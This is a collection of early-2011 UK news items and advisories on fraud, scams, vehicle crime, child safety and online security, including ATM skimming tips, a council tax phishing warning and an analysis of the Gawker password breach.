Charlotte Aynsley, Beatbullying Director of Practice continues: "Beatbullying is extremely proud of our long standing partnership with CEOP. It is vital we are able to work together in such a capacity and continue to produce useful tools to help highlight child safety online."

"Early intervention needs to be part of the solution if we are to educate our young people, teachers and families about the consequences of their actions and how to keep our children and young people safe online as well as offline."

CEOP are also council members of the government's UK Council For Child Internet Safety (UKCCIS) and will be supporting the launch of new good practice guidance for moderation, social networking, search, chat and instant messaging services - available at www.education.gov.uk/ukccis - and will continue to endorse the work of the UK Safer Internet Centre which is formed of Childnet, the South West Grid for Learning, and the IWF. Visit www.saferinternet.org.uk for more information.

CEOP will also be announcing the winner of this year's 'My Life Online' competition, which has been running on its Thinkuknow website since December 2010.

On the work of UKCCIS and wider collaboration, Peter Davies emphasised the need for partnership: "The real value of UKCCIS from our point of view is providing that mechanism and forum for ensuring collaboration from all interested sectors. This is fundamental to making children safe today. No matter what sector or position we represent, I truly believe that only by working together can we collectively make a real difference in making the internet safer today and into the future. That is why we as always remain fully committed to the principles of this vital Council".

(11th February 2011)


 

AVCIS PROVES ITS WORTH IN VEHICLE CRIME DETECTION
(Police Oracle, dated 8th February 2011)
www.policeoracle.com
 
Retrieval of stolen cars from South Africa takes recent recovery rates to £4million...
Following the recovery of 18 high-value stolen vehicles from South Africa, the UK's dedicated vehicle crime unit has announced that it has recovered vehicles valued in excess of £4 million during the past four months.

In the current economic climate, demand for high-value vehicles is great, and the ACPO Vehicle Crime Intelligence Service (AVCIS) has highlighted Durban as a key destination for stolen cars shipped from the UK. During a raid at a UK port in December 2010, containers with 16 stolen vehicles destined for Durban were intercepted by AVCIS, allowing the vehicles to be returned to their owners.

An ensuing investigation led to an additional 18 stolen cars being identified in South Africa, with AVCIS facilitating their recovery. The 36 vehicles recovered included models from prestige brands Audi, Lexus and Bentley, as well as Land Rover Discoveries.

"With shipping relatively cheap and loop holes present in African legislation, the exportation of stolen vehicles to this region is becoming increasingly popular with organised crime gangs," said AVCIS' Head of Unit, Detective Chief Inspector Mark Hooper. "The identities of legitimate vehicles are being cloned and attributed to identical stolen vehicles before being put into containers and shipped abroad, with Durban being high on the list of likely destinations."

Detective Constable Vince Wise, who visited South Africa to aid in the recovery of the vehicles, said: "We're working hard to identify and recover a significant number of vehicles that have been dispersed into Africa via Durban. We are aware that a number of stolen vehicles are located there and we're continuing our investigations in order to return these to the UK."

This investigation is just one of numerous operations AVCIS has in progress to recover stolen vehicles and remove them as a facilitator for serious organised crime. Funded predominantly by private sector partnerships, AVCIS receives a grant of £300,000 of tax payers' money from the Home Office to assist in its important work.

"Despite the austere climate, AVCIS has consistently recovered over £1 million worth of stolen vehicles each month since October 2010," added DCI Hooper. "We're extremely happy with the results over the past few months, and are especially pleased with the significant recovery from South Africa.

"In the current climate, motorists are extremely vulnerable. Not only is AVCIS working to recover vehicles but it's also putting resources into increasing awareness of vehicle crime and ways in which motorists can protect themselves," added DCI Hooper. "Without essential funding from the Home Office and our valued partners, we would not be able to carry out this important work."

It is recognised that 'traditional' vehicle crime, such as theft of or from vehicles is no longer regarded as a policing priority by most forces. Therefore, under the guidance of the Association of Police Officers (ACPO) portfolio lead for Vehicle Crime matters, the ACPO Vehicle Crime Intelligence Service (AVCIS) was launched on 15th December 2006 and is based in Ryton-on-Dunsmore, Warwickshire within the NIPA (National Policing Improvements Agency) site. The unit was initially funded by the Home Office, through the ACPO Acquisitive Crime Board and answers to Deputy Chief Constable David Ainsworth, of Wiltshire.

AVCIS does not exist in isolation, but operates within a complex and dynamic environment where national priorities are changing and high-level strategies require constant interpretation and reinterpretation. AVCIS works with partner agencies and all stakeholders within the trade and associated businesses to provide the most effective response. AVCIS speaks for the UK policing in respect of vehicle enabled crime matters.

AVCIS incorporates a number of specialist functions including TruckPol, the national freight crime intelligence service, and the Vehicle Fraud Unit who investigate organised finance fraud.

AVCIS offers the UK Police Service:
• A single point of contact for advice in relation to vehicle crime
• A team committed to tackling vehicle enabled crime
• An opportunity to work free from the barriers and constraints of a single police force
• No draw on resources for other operational matters
• A credible voice for the service within the industry
• A new concept with the full backing of the ACPO and therefore definition of all police forces in the UK

AVCIS - The Facts
• AVCIS have recovered in excess of 2,600 vehicles
• The total value of recovered assets exceeds £34 million
• AVCIS have made over 270 arrests.

Association of Chief Police Officers : www.acpo.police.uk
ACPO Vehicle Crime Intelligence Service (AVCIS) : www.avcis.org

(11th February 2011)


 

WATCH OUT FOR THIS COUNCIL TAX SCAM
(Yahoo Finance / lovemoney.com , dated 4th February 2011 author Rachel Wait )

If I had a penny for every time I heard the word scam, I'd have earned a fortune by now. Indeed, the number of scams doing the rounds seems to be getting higher and higher by the day.

About a year ago, fraudsters were caught sending out thousands of tax refund 'phishing' emails following the 31 January tax deadline. The email asked receivers to enter their credit card or bank details into an online form so that the rebate could be paid out.

But anyone who did so would find their account emptied, their credit card used to the limit, and in some cases, they even became a victim of identity fraud.

Now, a year on, and a similar scam is doing the rounds - this time regarding council tax.

How the scam works

The scam is operated by both email and telephone. Fraudsters contact you to say you're due a financial reward as a thank you for paying your council tax by direct debit.

The emails and calls claim to be from the 'Council Tax Head Office in London' and say you can earn a refund of hundreds of pounds if you provide your personal details, including your bank account details. There is, of course, no such thing as the Council Tax Head Office in London.

The scammers may also provide you with a phone number for you to call should you require more information. However, the numbers provided are thought to be connected to premium rate lines, meaning if you phone one, you could be charged at an extortionate rate.

What's more, if you then hand over your bank details - either by phone or in response to an email - the fraudsters will be able to access your bank account and the next time you check it, it's likely to be looking considerably less healthy.

What you can do

Several local councils, including Enfield and Lewisham in London, Aberdeen, Brighton and Hove, and the Wirral, have warned about the scam on their websites. So if you do have concerns, have a look on your local council's website to see if there are any further details.

It's worth remembering that your local council won't cold call, text or email you in this way, asking for bank details. If you are due any type of refund, your local council will contact you through the post explaining the situation.

So if you do receive a phone call to say you're due a financial reward on your council tax, hang up immediately - you may find they call back, but simply don't answer. And if you receive an email, don't click on any links in the email, don't press reply, and don't phone any numbers you've been given. And most importantly, don't hand over any personal details or bank account numbers.

If you are unsure about the validity of a call or email about council tax (or any other council service), get in touch with your local council. You'll be able to find the phone number of your local council on their website.

You can also seek advice from Consumer Direct on 08454 04 05 06 or check out the website.

Stay safe

These days, scams can be for just about anything. And the vast majority of us will have received a phishing email at some point in our lives.

The easiest way to spot a phishing scam is by looking at the spelling. Phishing emails are usually full of bad spelling and grammar. Not only that, but they tend to use generic greetings such as 'Dear customer' and 'Best regards'. So if you spot any of these trademarks, alarm bells should start to ring.

There may also be a sense of urgency to the email and of course, it's likely to ask you for personal details and bank account numbers - usually suggesting you need to respond immediately.

It's also a good idea to check any company names used in the email. Scammers often use a company name that looks similar to the real deal and if you've only looked at it quickly, you're unlikely to notice.

Finally, if you're concerned about telephone scams, it's worth registering with the Telephone Preference Service to request that unsolicited phone calls be stopped, although some scammers may find a way to call you regardless. This service is free.

If you're after some more general tips on how to stay safe online, check out our articles 12 tips to keep you safe online and 14 ways to protect your privacy.


 

LBE WARNING: COUNCIL TAX SCAM
(London Borough of Enfield website)
www.enfield.gov.uk

Residents are being urged not to give out personal information following reports of scam phone calls and e-mails offering refunds of overpaid Council Tax.

The calls and e-mails claim to be from the Council Tax Head Office in London and offer refunds of hundreds of pounds if the recipient gives out personal details, including their bank account numbers.

As part of the scam, three phone numbers have been given to people who want more information about their supposed refunds - 020 8123 0965, 020 3286 1358 and 020 8123 2739.

These phone calls and e-mails have no connection to the Council and we urge people not to give their bank details or other personal information to people who contact them out of the blue.

Anyone who is unsure about the validity of a call or e-mail about the Council or Council services should get in touch with us before they give out any information.

Anyone with concerns or questions about their Council Tax should call Enfield Council 020 8379 1000 or e-mail revs@enfield.gov.uk

To report a scam call Consumer Direct on 08454 04 05 06 or email them, details can be found at https://secure.consumerdirect.gov.uk/reportascam.aspx

(5th February 2011)



BRIGHTON NAMED AS BRITAIN'S CARD FRAUD CAPITAL
(Sky News, dated 19th January 2011)
http://news.sky.com

 

Brighton is apparently now the worst place in Britain for credit and debit card fraud, knocking London off the top spot.

The tourist hotspot has leapt to top of the league from 10th place last year in an annual study by life assistance company CCP (Xetra: A0H1P2 - news) .

The report found that 38% of people in Brighton said their details had been used by fraudsters at some point.

London came second with 34%, while Manchester (Frankfurt: A0ETDJ - news) was third with 33%.

There were also above-average instances of people falling victim to card fraud in Leeds, Bristol, Edinburgh and Southampton.

The CPP Card Fraud Index estimates that around 13 million Brits have now been affected by card fraud.

Around 28% of people said their credit or debit card had been used by fraudsters at some point, 7% of whom had been victims during the past 12 months.

But there is some positve news - the number of people affected during 2010 was slightly down on the 10% who were victims in 2009.

Sarah Blaney, card fraud expert at CPP, said: "In 2010 we saw a 3% decrease in card fraud incidents in the UK compared to the previous year.

"This in itself is good news and shows how progress is being made to reduce the number of victims. In particular, online fraud has decreased, which could be a result of industry initiatives such as Verified by Visa and MasterCard SecureCode.

"However, with card fraud costing the UK £440m a year, consumers still need to remain vigilant and not let their guard down."

Victims of card fraud reported the average amount stolen was £417 with 4% claiming losses of more than £2,000.

One in five people said they have had the magnetic strip on their card cloned at an ATM (3423.TWO - news) or chip and pin machine.

The same proportion said fraudsters had obtained their card details through the internet.

As many as a third of people said they did not even realise they had been the victims of fraud until they were contacted by their bank or their card was refused.

The research also found that many people were putting themselves at risk of card fraud by failing to take simple measures to protect themselves.

Around 18% of people said they never checked an ATM to see if it had been tampered with, while 17% said they did not shield their fingers when keying in their pin.

(5th February 2011)


 

FIVE TIPS TO PROTECT YOURSELF FROM ATM FRAUD
(Yahoo Finance / lovemoney.com, dated 2nd February 2011 author Donna Ferguson)

Ever heard of skimming? If you think it involves removing the floaty bits from a hot chocolate, think again. Skimming is a form of ATM fraud and it's a problem in many parts of the world.

Indeed, a man in China was recently jailed after withdrawing over 120,000 yuan (around £11,424) from other people's bank accounts using passwords he got hold of from a homemade ATM in Beijing!

The man had been installing card skimming devices and cameras at ATMs around Beijing since 2007 and used the stolen data to create counterfeits. However, after a close call, he changed tactics and got hold of a fake machine casing as well as other equipment to gather important data in a different way. He managed to forge a total of 31 cards.

Back in the UK, card protection firm CPP recently named Brighton as the UK's card fraud capital, with a staggering 38% of people having fallen victim to card crime in the past year.

However, London is almost as bad, with 34% of people having been defrauded, followed by Manchester (33%), Leeds (32%) and Bristol (32%).

So what is skimming and how does it work? And most importantly, how can you protect yourself?

How card skimming works

The most common form of skimming occurs when you go to use an ATM (automatic teller machine) and don't realise that a false front has been attached to the card reader - where you insert your card. This then captures your card number and transmits it wirelessly to someone waiting nearby.

A hidden camera will also be attached to the machine - perhaps in a leaflet holder, a loose wire or a loose fitting - and this will capture your PIN as you enter it.

Alternatively, criminals will use a keypad overlay that matches up with the buttons of the legitimate keypad below it, recording what is pressed and transmitting it to the fraudsters via a wireless device.

Criminals will then be able to make a copy of your card and use it, along with the PIN, to withdraw funds and buy goods. So the next time you check your bank account, it's likely to be empty.

Another technique used is where your card gets stuck in the machine and a kind passer-by offers to try your PIN for you. When this doesn't work, the same passer-by then offers to stand guard while you report the problem to the bank. The fraudster than takes the card and uses the PIN you gave him or her to withdraw your cash.

Here are five ways to protect yourself from ATM fraud:

1. Protect your PIN

It goes without saying that you should never carry your PIN on you, in case you get mugged.  That includes putting your PIN in your mobile phone as a contact under the name of your bank or an obvious entry like 'Pin'.

Similarly, protect your pin while you're at the ATM. Cover it with your hand when you enter it, and don't ever give it to anyone, especially if there's a problem with the machine.

Some fraudsters have been known to dress in bank uniforms and hang out by the machine, so even official-seeming offers to help should be rejected.

2. Pick your ATMs carefully

Try to only use ATMs inside a bank or those you are familiar with, as you are more likely to spot whether there's something different about the keypad or the card insert device. If you must use an ATM at night, avoid dimly-lit areas and opt for ATMs protected by CCTV.

3. Get cashback from shops instead

Each visit to an ATM involves potential risk - so try to make as few trips as you can.
Instead, try to get cashback from a reputable retailer when you make a purchase. Most supermarkets offer cashback and you don't need to make a large purchase to get your cash.

Remember to protect your pin from prying eyes again, and don't let the card out of your sight or even your hands, if possible.

4. Keep track of your accounts

Under the UK's Banking Code, banks are obliged to compensate you if you are a victim of card fraud.

However, if a large amount of time goes by before you notice it, the bank could argue you did not take reasonable care and potentially legitimately refuse to compensate you on that basis.In other words, the sooner you notice and report a fraud, the more likely it is that your bank will deal with your claim for compensation quickly and fairly.

So it's wise to regularly check all your bank accounts to ensure everything is correct.

Always open your bank and credit card statements promptly as well to ensure nothing is amiss.

5. Be suspicious

Always check the ATM to see whether anything looks suspicious - if anything has been added or changed, either go to a different ATM or, if you're outside a bank, go inside to ask about the changes.

Check the card reader before inserting your card. If you feel a small prong, then it's a false front - don't use it. Tell the bank.

Some modern ATMs run a picture of what the slot and keypad are supposed to look like, so keep an eye out for these and check whether anything looks different from the picture displayed.

What to do if you're a victim

1. Report the fraud - and any theft --to your bank immediately.

2. Report the fraud to the police.

3. Check your credit report to ensure the fraudsters haven't also stolen your identity. Consider buying protective registration from CIFAS. It only costs £14.10 and will force anyone applying for credit in your name to undergo extra identity checks.

(5th February 2011)




2011 SCAMS AWARENESS MONTH
(City of London Police, dated 2nd February 2011)
http://www.cityoflondon.police.uk

 

The City of London Police has joined with other local authorities and partners to work together to support the Office of Fair Trading (OFT) 2011 Scams Awareness Month, which was launched on 1 Feb. The campaign aims to raise awareness of the problem with mass marketed scams in Britain which arrive by post, email, text, phone or the internet to con people to part with their cash.

The campaign calls on consumers to drop scam mailings they have received into designated 'Scamnesty' bins or boxes at local libraries and public areas across the country.

New research commissioned by the OFT shows that 39% of people who lost money to a scam were victims of money transfer or an advance fee scam. These dupe people into handing over their bank details or paying an up front fee by leading them to believe they are entitled to an inheritance, donating to charity or even helping release funds from a corrupt country.

The survey also found:

•1 in 12 people (4%) lost money to a scam last year
•61% of people said they think scams looking real made them get involved
•Of those who reported being scammed in the last 12 months, 7% lost more than £4000
•39% who were scammed in last 12 months did not report it to the authorities

Michele Shambrook, Operations Manager for the OFT - managed advice service Consumer Direct said: "Scammers are using ever more sophisticated and cunning tactics to dupe people out of their cash. We want people to recognise the warning signs, and feel confident enough to seek advice from friends and family or from Consumer Direct."

To find out more information or report a scam visit the Consumer Direct website: www.consumerdirect.gov.uk/scamnesty.

(5th February 2011)


 


CHILDRENS SAFETY

When I was a kid I did some very stupid things, I suppose its all part of being a Kid. Another saying is " a little knowledge is a bad thing". Mix the two and you have the potential for an accident.

When I was at junior school I heard of something called an electro-magnetic. I had a horseshoe magnet at home, so how would a kid turn it into an electro-magnet ? Come on, you're a grown up, you must know ? Using my junior school logic you apply electricity to it don't you....(NO you don't). So I placed my horseshow magnet across the Live and Neutral of a plug that was in a socket in my bedroom. BANG !!! When I woke up, I discovered that I had been blown 8 feet away from the socket. The plug and socket was a burnt out mess and the house was in darkness.
A minute later my parents appeared at my bedroom door in a state of panic. Remember, this was the time of fuse boxes, not high tech consumer units that switch off dangerous conditions that it senses in ring mains. This little stunt could have killed me and is something you should definitely not do at home.

Then there was the time I tried to build a paper house around some birthday candles. That didn't work and I burnt both hands, but the people were nice at the hospital.

Then there was the time that made some crossbows out of scrap wood in my Fathers workshop. I managed to cut both the wood and the skin between my thumb and index finger with a crosscut saw to the depth of about an inch...loads of blood. The people at the hospital were nice again !

Then there was the time I got my thumb caught in a car door when it was being shut...the time when a Doctor had to put some small forceps up one of my nostrils to remove a bead from the nasal cavity. Then the go-cart made using pram wheels, no brakes, luckily no cars in the 60's (no not 1860's) !

So I got through my childhood with no broken bones, but I did manage to obtain a scratch, graze , cut or bruise on every limb. Sadly some of my friends were not so lucky.

My parents advice for safety; don't drink bleach,  don't go off with strangers, look both ways when crossing the road, hold the handrail when the bus is moving ( nothing about jumping off of the platform of a Routemaster bus when it is moving though..done that), don't run if a pack of dogs approach you !

Other than basic advice about child safety (ie. ensure your child has a polio vacination ) I can only assume that the Governments of the 50's and 60's thought child accidental deaths as a convenient way of culling the children of the working class population ( my attempt at political satire ).

Luckily now there are websites like www.capt.org.uk to provide some practical safety guidance.

The Child Accident Prevention Trust (CAPT) is the UK's leading charity working to reduce the number of children and young people killed, disabled or seriously injured in accidents.

They exist because accidents are a leading cause of death and serious injury for children and young people. Many of these accidents can be prevented.

Did you know…?

- Accidental injury is one of the biggest killers of children in the UK. It is second only to cancer.
- Childhood accidents cost the NHS over £275 million a year.
- Children from the poorest UK families are 13 times more likely to die in accidents. They are also more likely to be admitted to hospital with accidental injuries.

TAKE CARE OF YOURSELF AND YOUR FAMILY

(5th February 2011)


 



TSA TO TEST PRIVACY-ENHANCING SOFTWARE ON WHOLE BODY SCANNERS
(ComputerWorld, dated 1st February 2011 author Jaikumar Vijayan)
http://www.computerworld.com

The Transportation Security Administration (TSA) will soon begin testing new software designed to better protect the privacy of individuals passing through its full body scanners at U.S. airports.

The TSA says that the new software will eliminate the passenger-specific images that are generated by current Advanced Imaging Technology machines and replace them with generic images instead.

The software is designed to automatically detect potentially dangerous items on a person and to indicate its location on a generic outline of the individual, the TSA said in a statement .

Testing of the new software began today at Las Vegas' McCarran International Airport. Similar tests are scheduled to begin over the next few days at Atlanta's Hartsfield Jackson airport and at the Ronald Reagan National Airport in Arlington, Va.

The testing is being done to confirm if the new software will yield the "same high level of security" as the body scanners currently in use at U.S airports, but with better privacy protections, TSA Administrator John Pistole said today in a statement.

The TSA's move to test the new privacy-enhancing software appears designed to defuse stubborn concerns relating to the use of such systems. Though polls have suggested that a majority of Americans support the use of such scanners, several groups have expressed concerns over the technology and have asked for a through review of its usefulness.

Whole body imagers or advanced imaging technology (AIT) scanners, as the TSA calls them, are supposed to help detect non-metallic weapons and explosives concealed under a passenger's clothing. One example is the explosive PETN powder that would-be Christmas Day bomber Umar Farouk Abdulmutallab concealed in his underwear.

The TSA has already deployed, or is deploying, hundreds of such scanners around the country. By 2014, about 900 of the machines are expected to be installed at a cost of $130,000 to $170,000 per scanner.

Groups such as the Electronic Privacy Information Center (EPIC) have said that the detailed, three-dimensional images of passengers that are generated by such scanners are overly invasive and equivalent to a physical strip search. They have also challenged the TSA's claims about the efficacy of such systems in helping detect concealed threats.

EPIC and others have been pressing for a complete review of the technology and of its privacy implications. Even the Government Accountability Office (GAO) has called for a more thorough vetting of the technology over similar concerns.

The TSA has steadfastly downplayed such concerns. It has noted that the images generated by the scanners are too indistinct to identify individuals. It also notes that the agents who actually see the scanned images are located in a viewing station some distance away from the actual scanner so they have no idea of who is being scanned at any time.

The TSA has also repeatedly insisted that its scanners do not store images of scanned passengers -- an assertion that has been challenged by EPIC and others.

EPIC said today that the TSA's moves do not go far enough. "We are not at all convinced," that the new software will address privacy concerns, said Marc Rotenberg, president of EPIC. He said using the new software would actually create new privacy concerns because the TSA has indicated that it no longer needs a remote viewing facility once the new software becomes operational.

"We will be filing a FOIA lawsuit this week for more information about the revised airport screening software," Rotenberg said. He added that EPIC's previous lawsuit seeking a suspension of the body scanning program is scheduled for March 10 before the D.C. Circuit Court of Appeals.

(5th February 2011)


 

MET RE-LAUNCHES WEBSITE TO WARN OF LATEST SCAMS TO HIT THE UK
(Courtesy of Metropolitan Police, Bulletin 0000002211, dated 1st February 2011)
http://www.met.police.uk/

Officers from the MPS's Operation Sterling have today launched their new scam awareness website in support of Scam Awareness Month.

The 'new look' re-launched website, named 'Fraud Alert' is a one stop shop designed to equip members of the public and businesses with the tools they need to protect themselves against fraud.

The website will be updated as soon as a new scam that is targeting victims in the UK is discovered. For example, the latest scam to feature relates to fraudulent mail, which Police often refer to as Mass Marketing Fraud. Sent by professional fraudsters, these letters are designed to con recipients into investing in bogus schemes such as fake lotteries, share frauds and inheritance scams. They usually target the elderly and vulnerable.

Operation Sterling are not only proactively trying to stop this mail being delivered they are also offering prevention advice and tips on the fraud alert website.

The website provides a check list for members of the public to identify whether they are being scammed or not and also offers the prevention advice they need to stop themselves becoming victims of fraud. Additionally there is information on the website which explains how victims of fraud can report such activity.

Offering support to those who need more information and those who could potentially become victims of fraud is important to the MPS.

Detective Chief Inspector Nick Downing, from the Economic and Specialist Crime Command, said: "We hope that members of the public will use fraud alert to see up to date information on the latest scams being used to con them out of their hard earned cash.

"The new format should make it easier for those who don't regularly use computers to navigate their way around the alerts and the prevention advice available.

"Supporting our partners in raising awareness about frauds such as those detailed on the new site, is a priority for the prevention work that Operation Sterling are engaged with."

The MPS would urge anyone who thinks they may have been a victim of fraud to visit the new website at:
http://www.met.police.uk/fraudalert/reporting_fraud.htm

For fraud prevention advice please visit: http://www.met.police.uk/fraudalert/

(2nd February 2011)


 

FRIENDS REUNITED LOVE SCAM COSTS MUM-OF-THREE £80,000
(Metro, dated 31st January 2011 author Aidan Radnedge)
www.metro.co.uk

Mother-of-three Kate Roberts has told how she was tricked out of £80,000 by a fraudster posing as a lonely US soldier on the Friends Reunited website.

Ms Roberts lost her house in the scam, just ten months after she 'fell in love' with Sgt Mark Ray Smith. 'Aside from losing the money, I feel like I've lost the love of my life,' said the divorcée. 'I know he wasn't real but the feelings were real to me and that's very difficult to come to terms with.'

She now wants to warn others falling for what the US embassy warned was an 'increasingly common' type of fraud.

Ms Roberts was sucked in after clicking on the 'find someone perfect for you' area of Friends Reunited in October 2009.
She found a man claiming to be a 43-year-old widower serving in Iraq who had an 11-year-old daughter. They exchanged emails and started chatting several times a day on MSN. He even began calling after she gave him £225 for a phone line. The scammers posted pictures of a soldier in uniform and bare-chested. They even used a picture of a little girl to represent the daughter.

'What I am most worried about is that I emailed him pictures of myself and my children,' Ms Roberts, 47, told the BBC's Inside Out - South programme. 'I have no idea if those pictures are now being used by the gang to con other people out of money.'

The fake sergeant then begged the administrator from Melton Mowbray, Leicestershire, for money to buy himself leave from the army, backed up by receipts on forged US military headed paper. He then wanted to buy his way out of the army for good.
Between October 2009 and July last year, Ms Roberts wired him £80,000 either via Western Union or direct to his bank account.

But she found it was a scam when all contact stopped after she arranged for £12,000 to be sent to a friend of Sgt Smith's to pay for his flight to Britain.  Her phone company traced his number to a mobile phone in Nigeria. She then alerted police. 'When the officers told me I was the victim of a highly organised scam my world fell apart,' said Ms Roberts.

The US embassy is trying to identify the soldier whoose pictures was used.

(2nd February 2011)


 

GANG FACES JAIL FOR 2012 GAMES PROPERTY FRAUD
(Evening Standard, dated 1st February 2011 author Justin Davenport)
www.thisislondon.co.uk

Fraudsters who used the lure of the London Olympics to con pensioners into handing over their life savings were facing jail today.

The gang cold-called elderly people at home offering what they claimed was a lucrative property portfolio in Stratford, near the 2012 site.

Fraud squad officers who smashed the racket believe the gang got away with at least £300,000 between 2006 and 2007. Detectives traced up to 90 victims who each lost between £2,500 and £30,000.

Adrian Davison, 42, of south-east London, masterminded the scam, recruiting four accomplices - Andrew Bingham, 72, of East Sussex; Patrick Golding, 29, of Ashford, Kent; Kenneth Mullen, 42, of Lanarkshire, and Derrick Voysey, 63, of Buckinghamshire.

Victims were telephoned from a "boiler room" office in Barcelona, and urged to invest in bogus property schemes. Once hooked, they were sent glossy brochures and told to transfer money to the gang's front company, Almena Properties in Gibraltar, or to an address owned by Bingham in London.

In return they received fake share certificates and were repeatedly targeted to invest further.

The fraud came to light when a private investigator, looking to recover money owed to a client, discovered evidence of criminal activity in Almena's company accounts.

In October 2007 City of London Police were alerted and soon arrested Davison at his home. He and his accomplices were being sentenced today at Southwark crown court .

During the investigation detectives found victims so embarrassed that they continued to hide their losses from friends and family. One person only agreed to give evidence at a service station and had all his mail directed to his work address.

Detective constable Paul Kirk said today: "The gang used the coming of the Olympics to prey on the elderly and vulnerable, calling them day and night to steal their savings.

"This crime has taken a terrible toll on its victims, in some cases ruining their finances, their retirement and their health. This is one of the first cases I have heard of involving the Olympic Games."

Detectives worked with the Serious Fraud Office to obtain evidence from Spain, Latvia, Gibraltar and Albania. Davison was also found to be filtering off funds into a Somali bank. Police are now working to recover and return stolen money to investors.

In October Voysey was convicted of conspiracy to defraud, while Davison, Golding, Mullen and Bingham all admitted the same charge.

(2nd February 2011)


 

STREET-LEVEL CRIME MAPS LAUNCHED ONLINE
(BBC News, dated 1st February 2011)
www.bbc.co.uk

New online crime maps for England and Wales have been launched, allowing users to see which offences have been reported in their local streets.

Home Secretary Theresa May said the maps would give real facts and make police more accountable.

The public can search for information on crime and anti-social behaviour by entering a street name or postcode.

Some people have had problems accessing the website, www.police.uk. A minister said there had been heavy use. Policing Minister Nick Herbert told BBC Radio 4's Today programme that the website had been receiving 75,000 hits per minute.

A spokesman for charity Victim Support said it was important that victims of crime had consented as to whether information about their incident was released.

Meanwhile, Mrs May said she expected the public reaction to be positive and denied the information could increase fear or drive down house prices in some areas.

Visitors to the website, which cost £300,000 to develop, will be able to find out which crimes have taken place on or near

their street within the past month and which officers are responsible for their area.Information on crime is broken down into six categories - burglary, robbery, vehicle crime, violence, other crime and anti-social behaviour. Sex crimes have been included in the "other" category, along with crimes such as theft and shoplifting, to help prevent victims from being identified.

Local police appeals and details of police community meetings will also be published alongside the maps.

The website provides more detail, down to street-level, than existing online crime maps provided by forces in England and Wales.

Crime trends will also be established as the site develops and could be extended to include details on the outcomes of court cases, or a system for individual victims to track the progress of their case online.

The site show more than 6,500 incidents of anti-social behaviour were recorded by police in England and Wales every day in December.

'Transparency agenda'
 
The Metropolitan Police was the force with the highest number of recorded incidents of anti-social behaviour in December - 34,463 incidents.

Police forces in Greater Manchester and West Midlands had the next highest number of incidents - 10,233 and 8,442 respectively. According to the maps, areas in Preston, Swansea and Essex are among the most crime-ridden places in England and Wales.

The government said the site was an important part of its "transparency agenda", making the data available in an open format so that communities could use it to "help people engage with the police in a meaningful way".

Mrs May said: "I think people are going to welcome the fact they can really see what's happening with crime in their area, not just on their street but in their neighbourhood."I think they will feel a greater connection with the police, with much more information about where they can go to, and who they can work with."

System 'confusing'
 
"This is giving people a real tool, real power to see that something is being done about crime in their area. This doesn't make them frightened, it actually makes them feel a part of what is happening."

Policing Minister Nick Herbert also insisted that the more detailed information would not increase the fear of crime, adding: "We can't sweep crime under the carpet."

Shadow home secretary Yvette Cooper welcomed the crime maps, although she said they "should also include police strength for forces across the UK". She said: "Knowing where crime takes place isn't enough if there aren't sufficient police to deal with it. "People want to know what effect the government's deep and rapid cuts to the police are going to have on their area."

Streets with fewer than 12 houses will only be included in a wider geographic area to prevent identification of victims. However, the inclusion of a "quiet street" as one of the most crime-ridden in the country has been criticised by the local council.

'Complete farce'
 
The crime maps show Surrey Street in Portsmouth, Hampshire, as having 136 crimes, including burglary, violence and anti-social behaviour in December.

But the street, which is less than 100m long, is only home to a pub, a car park and a block of flats.

Councillor Eleanor Scott, who is responsible for community safety at Portsmouth City Council, said: "If Portsmouth is anything to go by, this website is a complete farce, it's identifying wrong crime epicentres and missing out crimes in other areas so you can't rely on it."

Chief Superintendent Nigel Hindle, commander of Portsmouth police, said the postcode of Surrey Street was used to record incidents of retail crime such as shoplifting from the adjacent commercial centre and violent crime from nearby bars and clubs.

Victim Support said victims' privacy should be protected, but that enough information should be given to the public "for them to be able to hold the police and criminal justice system to account".

"Victims and witnesses of crime often tell us that the criminal justice system can be confusing and unwieldy. This recommendation to publish fuller information has the potential to bring greater transparency to the workings of the criminal justice system for victims, witnesses and the public."

Crime mapping website : http://www.police.uk

(2nd February 2011)




GAWKER HACK ANALYSIS REVEALS WEAK PASSWORDS
(Computerworld, dated 14th December 2010 author Gregg Keizer)
www.computerworld.com

 

The most popular password among nearly 400,000 exposed by the Gawker (this is an online magazine) hack was "12345," according to an analysis done by a security firm.

In second place was the word "password" itself.

The most common passwords were uncovered by Duo Security, an Ann Arbor, Mich.-based two-factor authentication provider, after running John the Ripper (JtR), a password hash cracking tool, on the list of Gawker user passwords posted on the Web over the weekend.

On Sunday, Gawker, which operates several popular technology sites, including Gizmodo and Lifehacker, confirmed that its servers had been hacked, and that hundreds of thousands of registered users' e-mail addresses usernames and passwords had been accessed. A group calling itself "Gnosis" claimed credit for the attack and said it had pilfered more than 1.3 million accounts.

The top 25 passwords as ranked by Duo ranged from the absurdly easy-to-guess to the unintentionally hilarious, with "12345678" in third place, "monkey" in seventh, "letmein" in 10th, and "trustno1" -- a reference to the "Trust No One" expression popularized by the TV series The X-Files -- in 13th.

Using an eight-core Xeon-powered system, Duo Security brute-forced 400,000 password hashes of the 1.3 million stolen from Gawker, cracking the first 200,000 in under an hour.

That didn't come as a surprise to HD Moore, chief security officer at Rapid7.

"The DES crypt hash can be broken with ridiculous ease," said Moore in an e-mail reply to questions late Monday about the strength of the encryption used by Gawker to safeguard its users' passwords. "John the Ripper, along with most other tools, are well equipped to brute-force these."

Moore pointed out that the 56-bit DES (Data Encryption Standard) encryption used by Gawker had been broken more than a decade ago, when the Deep Crack machine built by the Electronic Frontier Foundation won a 1998 contest sponsored by RSA by breaking a DES key in just 56 hours. Six months later, EFF and Distributed.net collaborated to lower that time to just over 22 hours.

"These days, [graphics processor unit]-based cracking makes this even easier," noted Moore.

Duo Security uncovered other interesting tidbits during its analysis, including the fact that nearly all of the cracked passwords -- 99.45% -- were composed of alphanumeric characters only and did not contain any special characters or symbols.

Users are often urged to use special characters, such as the percent sign or ampersand symbol, and some enterprises require their employees to use the characters in self-set passwords.

Duo's analysis mirrored one done nearly two years ago by Imperva on a cache of 32 million unencrypted passwords disclosed after a hack of RockYou, a Facebook application developer.

Imperva noted that "123456" was the most common password in the collection posted on the Web by hackers, followed by "12345," "123456789," "password" and "iloveyou" (download PDF).

The ease with which Duo was able to decrypt hundreds of thousands of the leaked passwords lends credence to expectations that cybercriminals will do the same, then use the e-mail accounts, usernames and passwords to try to hack other accounts owned by the affected individuals.

On Monday, Andrew Storms, director of security operations at nCircle Security, said it was a sure bet that hackers would utilize the Gawker information, because many people reuse the same password for most of their e-mail and online accounts.

